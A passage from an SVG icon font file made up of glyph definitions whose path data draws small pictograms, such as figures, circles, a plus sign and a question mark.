0-0.634 0.385-14.918 6.191-29.668 17.173-41.284h0.056c3.194-3.274 3.11-8.422-0.249-11.588-1.625-1.513-3.716-2.255-5.726-2.255-2.118 0-4.237 0.827-5.89 2.532-12.358 12.936-19.541 29.203-21.33 45.826-4.101 0.878-8.394 1.348-12.744 1.348-9.742 0-19.597-2.339-29.015-7.267-1.184-0.69-2.396-0.991-3.744-0.991-2.945 0-5.834 1.597-7.323 4.321-2.118 4.016-0.601 9 3.415 11.118 11.701 6.252 24.275 9.197 36.667 9.197 4.321 0 8.643-0.357 12.744-1.019 1.513 14.585 7.238 28.841 16.981 40.843-9.554 7.708-17.422 17.643-22.411 29.010-13.622-9.85-29.809-14.834-45.855-14.834-5.698 0-11.316 0.658-16.929 1.87-5.148-38.146-37.982-67.575-77.505-67.575h-0.996c-16.788 0-32.031-6.581-43.21-17.478-1.597-1.541-3.659-2.311-5.533-2.311-2.231 0-4.378 0.822-5.947 2.475-3.279 3.222-3.199 8.422 0.136 11.588 14.092 13.739 33.468 22.133 54.544 22.133h0.907c0.085 0 0.085 0 0.085 0 5.585 0 10.846 0.742 15.961 2.118-7.628 10.348-18.221 18.465-31.41 22.65-4.378 1.353-6.576 5.947-5.369 10.268 1.404 4.321 6.003 6.717 10.433 5.341 17.751-5.646 32.2-17.206 41.806-31.791 16.624 9.878 28.512 27.465 30.138 47.917-8.122 3.772-15.75 9-22.514 15.745-3.227 3.218-3.227 8.399 0 11.593 3.222 3.194 8.45 3.194 11.616 0 6.604-6.604 14.228-11.372 22.542-14.374 0.089-0.028 0.193-0.056 0.193-0.056 6.75-2.447 13.899-3.716 21.034-3.716 14.449 0 28.869 5.064 40.453 15.088-1.019 5.007-1.536 10.099-1.536 15.44 0 4.486 3.631 8.23 8.286 8.23 4.406 0 8.122-3.744 8.122-8.23 0.061-31.603 23.613-57.56 54.192-61.412 2.043 18.136 10.184 34.431 22.382 46.63 3.189 3.222 8.474 3.222 11.663 0 3.138-3.161 3.138-8.37 0-11.565-9.517-9.526-15.853-22.049-17.586-36.084 26.037-2.861 48.245-18.578 60.191-40.706 14.862 1.982 27.939 9.193 37.625 19.733 3.030 3.302 8.145 3.575 11.532 0.521 3.415-3.030 3.631-8.23 0.55-11.616-11.118-12.255-26.229-20.954-43.374-24.228 1.982-6.797 3.081-14.035 3.081-21.466 0-0.113-0.103-0.193-0.103-0.277 0.193-16.459-3.969-30.166-11.452-41.669 14.59-6.604 27.441-17.699 35.892-32.726h0.061c2.25-3.964 0.822-8.972-3.199-11.175-1.264-0.747-2.663-1.076-4.011-1.076-2.776 0-5.585 1.489-7.154 4.129-7.534 13.434-19.4 22.876-32.801 27.69-5.115-4.819-11.118-9.164-17.723-12.964-18.056-10.818-26.671-28.357-26.864-55.742v-87.867h29.367c5.773 37.874 24.764 69.449 56.531 87.947v0.277c26.009 11.203 44.671 36.061 46.926 65.513 13.152 13.951 21.241 32.693 21.241 53.337 0 17.756-5.998 34.102-15.947 47.217 1.729 6.468 2.663 13.265 2.663 20.311 0.005 35.121-23.28 64.799-55.263 74.484zM586.94 362.181v-38.78h71.699v30.227c0 2.917 0.305 5.721 0.446 8.554h-72.145z" />
<glyph unicode="&#xe67c;" d="M889.189 951.996h-748.549c-73.348 0-133.012-59.679-133.012-133.026v-748.525c0-73.376 59.669-133.050 133.012-133.050h748.549c73.352 0 133.040 59.674 133.040 133.050v748.525c0 73.352-59.688 133.026-133.040 133.026zM78.463 520.737l123.688 18.935h208.013c35.121 0 63.356-28.348 63.352-63.248 0-34.736-27.991-62.83-62.863-63.108l-225.548 0.028c-15.026 0.193-27.136 12.387-27.136 27.437 0 15.196 12.302 27.498 27.493 27.498h116.501l94.87 19.818-5.115 24.524-92.338-19.296h-113.913c-28.977 0-52.539-23.561-52.539-52.543 0-10.076 2.997-19.428 7.952-27.437l-62.422 0.028v107.365zM518.44 613.465c-41.726 0-79.9-14.998-109.568-39.856h-105.218c44.173 72.089 123.439 120.367 214.157 120.367 138.771 0 251.246-112.49 251.246-251.27 0-138.771-112.48-251.265-251.246-251.265-80.891 0-152.665 38.395-198.6 97.769h124.731c22.542-10.959 47.752-17.295 74.503-17.295 94.293 0 170.75 76.462 170.75 170.783-0.005 94.307-76.462 170.768-170.754 170.768zM613.799 475.404c0-34.215-27.906-62.121-62.14-62.121-34.266 0-62.098 27.906-62.098 62.121 0 34.323 27.831 62.093 62.098 62.093 34.229 0 62.14-27.77 62.14-62.093zM78.66 323.175v49.072h523.532v-49.072h-523.532zM517.806 54.892c-159.852 0-297.106 96.51-356.855 234.374h127.070c49.565-74.094 133.947-122.927 229.78-122.927 152.637 0 276.353 123.726 276.353 276.367 0 152.623-123.716 276.372-276.353 276.372-105.218 0-196.674-58.847-243.355-145.413l-77.749 0.028-47.917-7.459c51.332 154.718 197.087 266.386 369.025 266.386 214.753 0 388.862-174.122 388.862-388.866 0-214.772-174.108-388.862-388.862-388.862zM597.062 759.132c-51.378 12.828-105.876 12.828-157.259 0-6.633-1.653-10.653-8.342-9-14.947 1.658-6.604 8.342-10.733 14.951-8.972 47.494 11.837 97.895 11.837 145.338 0 0.991-0.277 2.010-0.385 3.002-0.385 5.538 0 10.541 3.744 11.954 9.357 1.644 6.604-2.372 13.293-8.986 14.947z" horiz-adv-x="1029" />
<glyph unicode="&#xe67d;" d="M888.071 952.315h-748.535c-73.348 0-133.017-59.683-133.017-133.045v-748.474c0-73.376 59.669-133.059 133.017-133.059h748.535c73.348 0 133.045 59.683 133.045 133.059v748.474c0.005 73.362-59.693 133.045-133.045 133.045zM858.713 504.78c0-25.544-20.922-46.268-46.658-46.268-25.755 0-46.653 20.724-46.653 46.268 0 25.553 20.884 46.268 46.653 46.268 25.741 0 46.658-20.71 46.658-46.268zM813.958 653.171l17.746-0.977c-1.982-35.502-32.416-62.765-67.894-60.839l0.958 17.723c25.741-1.404 47.785 18.385 49.19 44.093zM764.223 715.893l17.507 3.025c6.083-35.009-17.478-68.448-52.487-74.545l-3.034 17.493c25.384 4.43 42.421 28.625 38.015 54.028zM701.637 765.792l16.379 6.881c13.786-32.726-1.63-70.623-34.327-84.414l-6.91 16.375c23.702 10.019 34.849 37.432 24.858 61.158zM629.445 800.364l14.392 10.39c20.809-28.818 14.313-69.153-14.449-89.999l-10.404 14.406c20.809 15.083 25.544 44.342 10.461 65.202zM513.874 814.756c33.628 0 60.966-27.3 60.966-60.966s-27.329-60.881-60.966-60.881c-33.604 0-60.886 27.221-60.886 60.881s27.282 60.966 60.886 60.966zM348.545 795.244c35.258-4.213 60.552-36.343 56.367-71.642l-17.643 2.090c3.053 25.572-15.275 48.856-40.843 51.909l2.118 17.643zM303.104 649.784l-16.76-5.848c-8.45 24.318-35.145 37.198-59.477 28.733l-5.834 16.774c33.548 11.673 70.374-6.106 82.070-39.659zM267.217 597.682l-15.022-9.493c-13.707 21.767-42.637 28.348-64.404 14.613l-9.47 15.055c30.076 18.935 69.956 9.869 88.895-20.175zM206.886 556.948c25.544 0 46.32-20.738 46.32-46.334 0-25.544-20.781-46.291-46.32-46.291s-46.291 20.752-46.291 46.291c-0.005 25.595 20.748 46.334 46.291 46.334zM232.814 449.433c-0.362-46.188-10.184-52.294-26.892-52.294-16.816 0-25.764 6.111-26.145 52.294 16.539 0 36.277 0 53.037 0zM326.149 246.728c0-11.208-8.836-20.311-20.038-20.311-11.147 0-20.203 9.103-20.203 20.311 0 13.002 0 129.325 0 129.325h-16.929v-162.915h-126.135v162.929h-16.76c0 0 0-116.327 0-129.329 0-11.208-9.080-20.311-20.255-20.311-11.203 0-19.982 9.103-19.982 20.311 0 11.175 0 126.769 0 143.449 0 32.726 29.198 59.256 61.952 59.256 3.551 0 10.79 0 19.926 0 0-43.525 12.551-64.348 32.918-64.348v-52.158c-5.721-2.447-9.714-8.107-9.714-14.754 0-8.897 7.069-15.942 15.961-15.942 8.859 0 15.961 7.295 15.961 16.154 0 6.609-4.044 12.307-9.77 14.754v52.13c19.404 0 32.561 19.085 32.561 64.16 9.55 0 17.173 0 20.945 0 32.726 0 59.561-26.53 59.561-59.26 0-16.68 0-132.274 0-143.449zM332.171 690.571c-2.809 25.572-25.901 44.149-51.496 41.369l-1.926 17.671c35.337 3.824 67.213-21.8 71.065-57.1l-17.643-1.94zM659.423 415.331c0-14.486-11.753-26.229-26.229-26.229s-26.229 11.743-26.229 26.229l-0.089 177.246h-15.412v-480.66c0-18.977-15.383-34.346-34.374-34.346s-34.37 15.369-34.37 34.346v297.688h-17.615v-297.688c0-18.977-15.44-34.346-34.431-34.346s-34.346 15.369-34.346 34.346v480.66h-15.468l-0.028-177.246c0-14.486-11.753-26.229-26.229-26.229s-26.229 11.743-26.229 26.229v195.979c0 43.158 30.88 67.612 73.183 67.612h144.689c42.275 0 73.183-24.454 73.183-67.612v-195.979zM938.308 242.909c-10.433-2.983-21.109 2.273-23.862 11.842l-35.699 124.665-17.45 0.028 47.729-166.306h-193.921l47.691 166.306-17.422-0.028-35.718-124.665c-2.724-9.568-13.406-14.825-23.834-11.842-10.461 2.987-17.065 12.124-13.57 24.083l36.737 127.892c14.702 51.139 57.466 49.537 57.466 49.537h91.211c0 0 42.797 1.597 57.466-49.537l36.709-127.892c3.532-11.959-3.072-21.095-13.533-24.083z" horiz-adv-x="1029" />
<glyph unicode="&#xe67e;" d="M878.941 949.43h-741.734c-72.681 0-131.807-59.131-131.807-131.845v-741.697c0-72.709 59.127-131.84 131.807-131.84h741.734c72.681 0 131.835 59.131 131.835 131.84v741.697c0 72.713-59.155 131.845-131.835 131.845zM506.233 862.729c61.556 0 111.49-49.911 111.49-111.472s-49.934-111.5-111.49-111.5c-61.58 0-111.514 49.939-111.514 111.5s49.934 111.472 111.514 111.472zM796.858 117.313c0-26.973-21.197-48.849-48.17-48.849s-48.812 21.876-48.812 48.849c0 31.423 0 311.715 0 311.715h-40.853v-377.391h-303.9v377.391h-40.42c0 0 0-280.292 0-311.715 0-26.973-21.821-48.849-48.789-48.849-26.917 0-48.137 21.876-48.137 48.849 0 26.978 0 305.552 0 345.721 0 78.881 70.363 142.811 149.262 142.811 17.292 0 69.711 0 125.482 0v-105.467l-24.115-6.656v26.238c0 15.681-14.345 29.919-40.42 12.381-36.65-24.767-76.227-165.418-33.35-159.888 20.75 2.644 32.447 12.688 55.222 13.964 18.46 0.954 18.539 8.927 18.539 19.4 0.028 10.473 0 44.102 0 44.102v16.389c6.218 1.722 15.77 4.366 24.115 6.684v-148.266c0.028 0 0.41-10.384-9.407-10.384h-10.091c-0.191 0-0.354 0.102-0.545 0.102h-29.673c-26.401 0-47.886-21.518-47.886-47.942 0-26.429 21.485-47.923 47.886-47.923h132.934c4.692 0 8.536-3.845 8.536-8.564s-3.845-8.536-8.536-8.536h-137.542c-21.001 0-38.102-17.124-38.102-38.153 0-21.001 17.101-38.107 38.102-38.107h137.542c4.692 0 8.536-3.845 8.536-8.569 0-4.72-3.845-8.536-8.536-8.536h-160.861c-8.155 0-14.783-6.628-14.783-14.783 0-8.183 6.628-14.787 14.783-14.787h160.861c21.001 0 38.102 17.078 38.102 38.107 0 21.034-17.101 38.13-38.102 38.13h-137.542c-4.692 0-8.536 3.817-8.536 8.536 0 4.752 3.845 8.592 8.536 8.592h137.542c21.001 0 38.102 17.078 38.102 38.107 0 21.025-17.101 38.125-38.102 38.125h-132.934c-10.119 0-18.33 8.239-18.33 18.353s8.211 18.385 18.33 18.385h22.444c19.907-37.343 83.316-20.568 94.962-13.48 50.483 29.757 40.253 66.267 23.948 78.96-25.884 20.042-62.073-4.557-62.073-4.557v128.735c7.256-1.801 16.314-4.012 24.138-5.893v-18.739c0 0-0.023-33.634 0-44.106 0.028-10.473 0.028-18.437 18.544-19.391 22.798-1.28 34.499-11.325 55.203-13.964 42.896-5.534 3.351 135.117-33.387 159.884-26.079 17.538-40.369 3.3-40.369-12.381v-24.138l-24.138 5.916v104.104c57.656 0 112.989 0 131.263 0 78.876 0 143.509-63.93 143.518-142.792 0.009-40.169 0.009-318.743 0.009-345.721z" horiz-adv-x="1019" />
<glyph unicode="&#xe67f;" d="M662.42 576.052h159.965c19.569 0 35.422 15.886 35.403 35.445v40.021h-25.403c-2.339 0-4.43 1.456-5.228 3.659 0 0-4.984 13.486-9.277 25.215-4.016-11.452-8.615-24.388-8.615-24.388-0.822-2.339-3.081-3.852-5.58-3.716-2.475 0.108-4.575 1.87-5.153 4.293 0 0-8.009 33.581-14.505 60.881-3.88-34.374-9.935-88.050-9.935-88.050-0.249-2.339-1.982-4.265-4.265-4.815-2.278-0.55-4.646 0.357-5.97 2.339 0 0-13.599 20.452-16.346 24.581-4.678 0-22.514 0-22.514 0-2.339 0-4.453 1.456-5.223 3.659 0 0-4.984 13.486-9.301 25.215-4.044-11.452-8.615-24.388-8.615-24.388-0.822-2.339-3.081-3.852-5.58-3.716-2.48 0.108-4.575 1.87-5.153 4.293 0 0-8.037 33.581-14.505 60.858-3.88-34.346-9.906-88.022-9.906-88.022-0.272-2.339-1.982-4.265-4.26-4.815-2.283-0.55-4.678 0.357-5.998 2.339 0 0-13.594 20.452-16.342 24.581-2.837 0-9.164 0-13.134 0v-40.021c-0.009-19.569 15.787-35.45 35.441-35.45zM626.993 662.739h16.149c1.87 0 3.631-0.935 4.65-2.475 0 0 4.758-7.154 9.493-14.284 2.64 23.284 11.753 104.617 11.753 104.617 0.324 2.701 2.532 4.819 5.252 4.956 2.696 0.164 5.148-1.653 5.778-4.298 0 0 11.917-49.96 17.558-73.573 3.716 10.484 7.487 21.138 7.487 21.138 0.77 2.203 2.856 3.716 5.228 3.716 2.367 0.028 4.481-1.456 5.313-3.659 0 0 11.057-30.086 13.26-36.141 5.618 0 21.612 0 21.612 0 1.893 0 3.626-0.935 4.678-2.475 0 0 4.73-7.154 9.493-14.284 2.621 23.284 11.753 104.617 11.753 104.617 0.301 2.701 2.504 4.819 5.256 4.956 2.696 0.164 5.143-1.653 5.778-4.298 0 0 11.917-49.932 17.554-73.573 3.687 10.484 7.459 21.138 7.459 21.138 0.803 2.203 2.889 3.716 5.228 3.716 2.367 0.028 4.514-1.456 5.313-3.659l13.293-36.141h21.466v96.143c0 19.569-15.853 35.394-35.422 35.394h-159.965c-19.658 0-35.455-15.825-35.455-35.394h0.023v-96.134zM888.935 953.884l-748.539-0.005c-73.348 0-133.017-59.674-133.017-133.040v-748.511c0-73.38 59.669-133.054 133.017-133.054h748.539c73.348 0 133.045 59.674 133.045 133.054v748.516c0 73.366-59.697 133.040-133.045 133.040zM389.035 708.852c5.58 0 10.123-4.514 10.123-10.099 0-4.242 3.438-7.708 7.685-7.708 4.237 0 7.68 3.471 7.68 7.708 0 25.008 20.367 45.361 45.385 45.361 25.13 0 45.606-20.466 45.606-45.634v-233.918h-20.264v233.918c0 14.007-11.391 25.389-25.346 25.389-13.871 0-25.154-11.273-25.154-25.116 0-15.426-12.495-27.939-27.902-27.939-15.383 0-27.906 12.513-27.906 27.939-0.005 5.585 4.509 10.099 10.094 10.099zM749.258 441.114c22.514 0 40.706-17.648 40.927-40.030l0.089-108.079h-411.329v148.076l370.312 0.033zM380.505 649.352h65.78c0 0 5.064-21.927 5.064-56.921 0-34.999-5.064-56.935-5.064-56.935h-25.736c0.028-2.917 0.442-40.227-22.542-70.933h-18.225c27.667 28.066 26.868 70.299 26.84 70.741 0 0.085 0.056 0.136 0.056 0.193h-26.173c0 0-5.89 17.723-5.89 56.935 0 39.208 5.89 56.921 5.89 56.921zM305.532 461.040c28.32 0 51.247-22.908 51.247-51.223 0-28.32-22.927-51.261-51.247-51.261-28.348 0-51.332 22.941-51.332 51.261 0 28.31 22.984 51.223 51.332 51.223zM258.659 343.5h72.854c13.956 0 25.266-11.287 25.266-25.196 0-13.927-11.311-25.271-25.266-25.271h-72.854c-13.96 0-25.243 11.344-25.243 25.271 0.005 13.909 11.287 25.196 25.243 25.196zM814.681 74.019v112.743h-599.425v-112.743h-67.349v425.007c0 18.376 14.477 33.303 32.918 33.303v0.028c18.385 0 34.431-14.961 34.431-33.332v-231.541h599.416v164.075c0 18.385 14.998 33.318 33.412 33.318s33.332-14.933 33.332-33.318v-357.536h-66.734zM881.448 553.946h-278.256v265.174h278.256v-265.174z" />
<glyph unicode="&#xe680;" d="M252.233 657.056c44.506 0 80.732 36.188 80.732 80.713 0 44.474-36.22 80.718-80.732 80.718-44.478 0-80.642-36.244-80.642-80.718-0.005-44.525 36.164-80.713 80.642-80.713zM249.457 800.12c4.453 0 8.065-3.607 8.065-8.070v-48.353l41.34 19.47c3.993 1.926 8.807 0.193 10.705-3.828 1.893-4.049 0.164-8.84-3.852-10.738l-52.905-25.013c-2.4-1.099-5.345-0.991-7.732 0.578-2.010 1.292-3.241 3.33-3.579 5.562l-0.108 62.323c0 4.467 3.631 8.070 8.065 8.070zM598.213 794.896h14.975v14.989h14.998v14.961h-14.998v14.984h-14.975v-14.984h-14.975v-14.961h14.975zM888.837 953.504h-748.6c-73.324 0-132.993-59.688-132.993-133.050v-748.506c0-73.38 59.674-133.050 132.993-133.050h748.6c73.352 0 133.054 59.669 133.054 133.050v748.506c0 73.366-59.702 133.050-133.054 133.050zM605.781 845.721c21.387 0 56.395-8.986 75.879-30.316l-26.258-50.439c-11.475 14.834-29.428 24.369-49.622 24.369-19.954 0-37.705-9.315-49.19-23.876l-26.779 48.828c22.542 22.556 53.704 31.434 75.969 31.434zM653.862 723.409c0-26.605-21.579-48.18-48.194-48.18s-48.175 21.579-48.175 48.18c0 26.629 21.56 48.194 48.175 48.194s48.194-21.56 48.194-48.194zM501.737 618.529c4.406 15.44 23.918 42.773 57.607 42.952l93.851-0.070c32.951-0.822 52.050-27.634 56.433-42.881l41.2-134.717h-40.927l-31.049 103.363h-21.518l29.945-103.339h-163.441l30.17 103.339h-21.523l-30.246-103.363h-41.538l41.035 134.717zM381.323 446.37l370.749 0.113c22.57 0 40.796-17.685 40.988-40.086l0.085-108.229h-411.822v148.203zM252.261 845.002c59.12 0 107.262-48.105 107.262-107.262 0-59.148-48.142-107.233-107.262-107.233-59.148 0-107.205 48.086-107.205 107.233 0 59.157 48.053 107.262 107.205 107.262zM307.801 363.788c-28.376 0-51.303 22.984-51.303 51.303 0 28.353 22.927 51.252 51.303 51.252 28.353 0 51.336-22.899 51.336-51.252 0-28.32-22.984-51.303-51.336-51.303zM359.137 323.495c0-13.932-11.316-25.243-25.243-25.243h-72.962c-13.984 0-25.215 11.311-25.215 25.243 0 13.927 11.231 25.238 25.215 25.238h72.962c13.932 0 25.243-11.311 25.243-25.238zM884.379 78.956h-66.832v112.861h-600.050v-112.861h-67.462v425.425c0 18.427 14.505 33.388 32.918 33.388v0.028c18.47 0 34.544-14.989 34.544-33.416v-231.781h600.055v164.263c0 18.413 14.975 33.388 33.496 33.388 18.446 0 33.336-14.975 33.336-33.388v-357.907z" horiz-adv-x="1029" />
<glyph unicode="&#xe681;" d="M893.212 948.433h-766.559c-64.436 0-116.66-52.224-116.66-116.651v-766.559c0-64.427 52.224-116.651 116.66-116.651h766.559c64.427 0 116.651 52.224 116.651 116.651v766.559c0 64.427-52.224 116.651-116.651 116.651zM505.221 86.443c-200.135 0-362.373 162.228-362.373 362.382 0 200.145 162.219 362.382 362.373 362.382 200.126 0 362.373-162.247 362.373-362.382 0-200.135-162.238-362.382-362.373-362.382zM505.221 730.207c-155.411 0-281.391-125.98-281.391-281.382 0-155.401 125.971-281.401 281.391-281.401 155.411 0 281.391 125.999 281.391 281.401 0 155.401-125.98 281.382-281.391 281.382zM547.982 206.658h-82.897v85.087h82.897v-85.087zM630.888 471.514c-34.911-46.658-82.906-27.913-82.906-102.533 0-49.749 0-48.877 0-48.877h-82.897v82.925c0 37.073 14.829 63.687 46.251 79.407 44.383 22.187 83.333 64.123 48.422 107.33-14.924 18.479-33.593 20.499-55.41 20.499-36.646 0-73.311-20.063-73.311-77.227 0-19.209-0.161-28.966-0.161-28.956l-80.555 0.171c-13.094 104.277 54.964 152.756 74.174 165.803 23.116 15.711 106.041 44.506 179.323-13.53 64.057-50.707 74.278-121.884 27.070-185.012z" horiz-adv-x="1015" />
<glyph unicode="&#xe682;" d="M661.222 651.978c-7.976 4.57-18.080 1.79-22.678-6.163-4.542-7.957-1.79-18.089 6.163-22.66 7.952-4.514 18.080-1.761 22.65 6.191 4.542 7.99 1.79 18.089-6.135 22.631zM615.696 668.874c7.929-4.538 18.084-1.761 22.598 6.191 4.599 8.009 1.87 18.080-6.083 22.622-7.981 4.57-18.103 1.818-22.706-6.163-4.486-7.924-1.761-18.080 6.191-22.65zM674.544 668.879c7.952-4.542 18.084-1.761 22.65 6.191 4.599 7.952 1.761 18.080-6.135 22.622-7.952 4.57-18.080 1.818-22.678-6.191-4.514-7.896-1.818-18.052 6.163-22.622zM643.913 715.832c7.952-4.542 18.080-1.766 22.65 6.163 4.538 8.009 1.79 18.080-6.144 22.65-7.976 4.57-18.080 1.79-22.678-6.163-4.538-7.957-1.785-18.084 6.172-22.65zM597.175 567.747c-7.816-4.594-10.545-14.721-5.947-22.65 4.622-7.924 14.806-10.592 22.735-5.97 7.929 4.57 10.569 14.754 6.003 22.65-4.627 7.952-14.754 10.62-22.791 5.97zM890.401 954.251l-748.539-0.005c-73.348 0-133.017-59.669-133.017-133.026v-748.525c0-73.385 59.669-133.050 133.017-133.050h748.535c73.348 0 133.045 59.664 133.045 133.050v748.53c0.005 73.357-59.693 133.026-133.040 133.026zM632.954 834.104c4.627 7.896 14.778 10.597 22.735 6.027 7.901-4.678 10.569-14.806 5.97-22.706-4.622-7.929-14.778-10.597-22.706-5.97-7.924 4.594-10.597 14.721-5.998 22.65zM678.78 766.581c45.549 0 82.512-36.963 82.512-82.512s-36.963-82.493-82.512-82.493c-45.577 0-82.512 36.944-82.512 82.493-0.005 45.549 36.934 82.512 82.512 82.512zM609.257 612.916c-2.010-8.892-10.869-14.613-19.79-12.631-8.972 1.954-14.585 10.869-12.612 19.761 1.987 8.972 10.851 14.613 19.766 12.631 8.92-2.010 14.59-10.79 12.636-19.761zM581.984 804.681c4.599 7.896 14.778 10.597 22.706 5.998 7.948-4.622 10.597-14.778 5.994-22.678-4.622-7.952-14.726-10.62-22.758-5.97-7.84 4.594-10.564 14.749-5.942 22.65zM572.35 750.371c2.039 9 10.869 14.641 19.79 12.659 8.944-2.010 14.613-10.79 12.631-19.761-1.982-8.915-10.846-14.613-19.79-12.631-8.944 1.954-14.557 10.846-12.631 19.733zM573.285 699.481c8.944-1.982 14.585-10.761 12.631-19.761-1.982-8.892-10.851-14.585-19.79-12.631-8.944 1.982-14.585 10.869-12.631 19.761 2.062 8.972 10.869 14.641 19.79 12.631zM553.688 587.428c-7.929-4.599-18.056-1.954-22.65 5.97-4.617 7.929-1.893 18.056 5.97 22.678 7.952 4.627 18.056 1.959 22.706-5.998 4.622-7.929 1.926-18.028-6.027-22.65zM531.038 775.285c4.599 7.873 14.726 10.541 22.65 5.919 7.952-4.627 10.649-14.702 6.027-22.631-4.65-7.952-14.754-10.625-22.706-6.027-7.868 4.65-10.592 14.778-5.97 22.739zM523.771 697.72c7.952-4.542 10.658-14.641 6.139-22.65-4.57-7.929-14.726-10.705-22.645-6.163-7.981 4.514-10.677 14.67-6.191 22.598 4.585 7.976 14.74 10.729 22.697 6.214zM483.206 749.709c6.741 6.163 17.258 5.67 23.416-1.076 6.191-6.769 5.702-17.201-1.047-23.392-6.745-6.191-17.23-5.693-23.449 1.076-6.158 6.712-5.717 17.201 1.080 23.392zM482.13 642.372c6.219 6.741 16.708 7.238 23.449 1.047 6.75-6.191 7.238-16.633 1.047-23.43-6.163-6.717-16.68-7.21-23.416-1.076-6.802 6.191-7.243 16.732-1.080 23.458zM272.459 759.371c41.505 18.582 90.305 0 108.882-41.505 18.606-41.477 0-90.201-41.505-108.779-41.505-18.606-90.305-0.052-108.91 41.486-18.634 41.505-0.028 90.22 41.533 108.798zM456.779 563.703l-62.779-184.254c-5.256-13.406-18.385-22.486-33.632-22.486-13.486 0-24.985 7.323-30.908 18.277l-27.686 49.72-38.752-115.214v-232.199h-140.917v283.714c0 7.976 2.231 23.186 5.67 31.744l47.090 140.922c13.57 40.598 57.471 62.506 98.093 48.936 17.554-5.89 31.617-17.478 40.838-31.984l38.973-69.806 35.972 105.777c6.384 18.77 26.751 28.869 45.606 22.458 18.775-6.412 28.846-26.807 22.434-45.606zM451.772 646.28c-7.929-4.599-18.084-1.926-22.678 5.97-4.646 7.901-1.926 18.056 5.923 22.706 7.976 4.57 18.16 1.902 22.758-5.97 4.594-7.929 1.949-18.056-6.003-22.706zM457.77 699.702c-4.599-7.901-14.778-10.569-22.758-5.97-7.849 4.594-10.569 14.778-5.923 22.65 4.599 7.896 14.754 10.597 22.678 5.998 7.957-4.678 10.602-14.778 6.003-22.678zM893.863 216.045c0-19.982-15.769-36.249-35.751-36.249-19.869 0-36.028 16.267-36.028 36.249 0 23.176 0 230.63 0 230.63h-30.194v-369.129h-97.073v100.023h-30.852v-100.023h-97.012v369.129h-29.889c0 0 0-207.454 0-230.63 0-19.982-16.149-36.249-36.136-36.249-19.921 0-35.582 16.267-35.582 36.249 0 19.926 0 226.060 0 255.812 0 58.354 52.074 105.693 110.451 105.693 28.183 0 182.916 0 211.846 0 58.349 0 106.238-47.344 106.228-105.693-0.009-29.752-0.009-235.886-0.009-255.812zM648.23 538.352c-7.924-4.594-10.597-14.749-5.998-22.711 4.622-7.868 14.778-10.569 22.706-5.97 7.929 4.65 10.597 14.787 5.998 22.683-4.622 7.924-14.782 10.592-22.706 5.998z" horiz-adv-x="1029" />
<glyph unicode="&#xe683;" d="M897.428 942.338c0 0-773.449 0.244-773.223 0-71.285 0-111.362-36.855-111.362-112.151v-776.267c0-70.44 36.028-107.313 107.266-107.313h779.546c71.229 0 107.304 35.041 107.304 107.313v776.267c0.009 73.465-36.065 112.151-109.53 112.151zM721.121 776.995l37.672-37.672-24.351-24.351-37.672 37.672 24.351 24.351zM274.019 199.76l-92.789 92.789 23.176 23.176 92.789-92.789-23.176-23.176zM320.794 246.422l-92.808 92.808 23.186 23.176 92.799-92.808-23.176-23.176zM276.405 388.11l23.176 23.176 92.789-92.808-23.176-23.176-92.789 92.808zM437.173 549.338l23.186 23.176 92.789-92.808-23.186-23.176-92.789 92.808zM500.154 421.921l-23.186-23.176-92.789 92.789 23.176 23.176 92.799-92.789zM516.566 670.668c-47.461 0-81.225-15.82-109.39-53.596-15.275-20.386-24.83-47.63-29.64-72.845-3.748-20.64 0.442-36.535-20.734-36.535-13.134 0-20.386 13.669-20.386 26.812 0.019 97.026 77.739 176.917 174.775 176.917 99.723 0 185.494-76.133 185.494-175.856 0-12.861-8.577-25.722-21.438-25.722-13.941 0-17.154 16.346-19.306 30.015-4.838 30.015-7.243 49.321-23.608 75.043-26.784 42.087-65.639 55.766-115.768 55.766zM355.563 465.746l92.78-92.808-23.176-23.176-92.789 92.808 23.186 23.176zM728.872 396.18c-42.613-59.232-83.63-94.349-83.63-167.26v-55.766c0-69.153-59.514-122.241-128.648-122.241-69.97 0-128.667 55.474-128.667 125.454 0 16.638 12.326 31.115 28.954 31.115 25.196 0 24.116-32.439 33.238-55.775 11.255-28.409 34.572-45.028 65.404-45.028 39.401 0 73.982 29.207 73.982 68.627v62.182c0 125.736 128.667 170.219 128.667 295.927 0 111.25-90.337 201.578-201.578 201.578-68.899 0-117.412-22.509-158.711-77.195-24.388-32.439-35.38-56.292-40.744-96.491-3.222-24.933-3.73-57.908-28.944-57.908-16.628 0-28.954 14.477-28.954 31.105-0.009 141.509 117.938 254.102 259.467 254.102 140.466 0 253.069-115.797 253.069-256.254-0.009-55.474-10.738-91.127-42.905-136.173zM783.792 764.416l-37.672 37.672 24.36 24.36 37.681-37.672-24.369-24.36z" horiz-adv-x="1015" />
<glyph unicode="&#xe684;" d="M886.77 954.847h-748.572c-73.348 0-133.017-59.679-133.017-133.045v-748.497c0-73.38 59.669-133.068 133.017-133.068h748.572c73.348 0 133.012 59.688 133.012 133.068v748.497c0.005 73.366-59.664 133.045-133.012 133.045zM824.315 343.552h-207.877v-207.863h-207.825v207.863h-207.933v207.985h207.933v207.849h207.825v-207.849h207.877v-207.985z" />
<glyph unicode="&#xe685;" d="M894.339 955.89h-752.022c-73.681 0-133.625-59.963-133.625-133.663v-751.927c0-73.719 59.944-133.691 133.625-133.691h752.022c73.681 0 133.625 59.972 133.625 133.691v751.927c0.005 73.704-59.939 133.663-133.625 133.663zM794.138 739.967c29.167 0 52.606-23.585 52.606-52.677 0-29.064-23.443-52.62-52.606-52.62-29.002 0-52.62 23.557-52.62 52.62 0 29.092 23.618 52.677 52.62 52.677zM822.39 614.148c-0.061-5.941-0.58-38.709-7.659-48.609-7.824-10.825-20.593-9.178-20.593-9.178s-14.407-0.495-20.102 8.348c-5.639 8.654-8.376 25.845-8.183 49.44h56.537zM165.242 845.699h355.687v-245.93l-20.768 20.758v204.38h-314.236v-397.841h314.236v125.065l20.768-20.768v-125.131h-355.687v439.466zM416.447 473.161c2.543-8.706-2.459-17.804-11.146-20.348-1.553-0.444-3.096-0.665-4.62-0.665-7.107 0-13.666 4.643-15.733 11.807l-38.181 131.011h-13.52l-38.185-131.011c-2.1-7.163-8.659-11.807-15.771-11.807-1.519 0-3.044 0.222-4.591 0.665-8.706 2.543-13.68 11.637-11.141 20.348l38.657 132.672v85.082l-9.787-0.028-0.057 0.028-21.957-74.766c-1.548-5.224-6.304-8.598-11.476-8.598-1.109 0-2.241 0.17-3.374 0.486-6.333 1.864-9.98 8.499-8.102 14.846 0 0 22.972 78.126 23.005 78.197 9.15 30.404 34.844 29.493 34.844 29.493h69.396c0 0 25.661 0.911 34.816-29.493 0.028-0.071 23.033-78.197 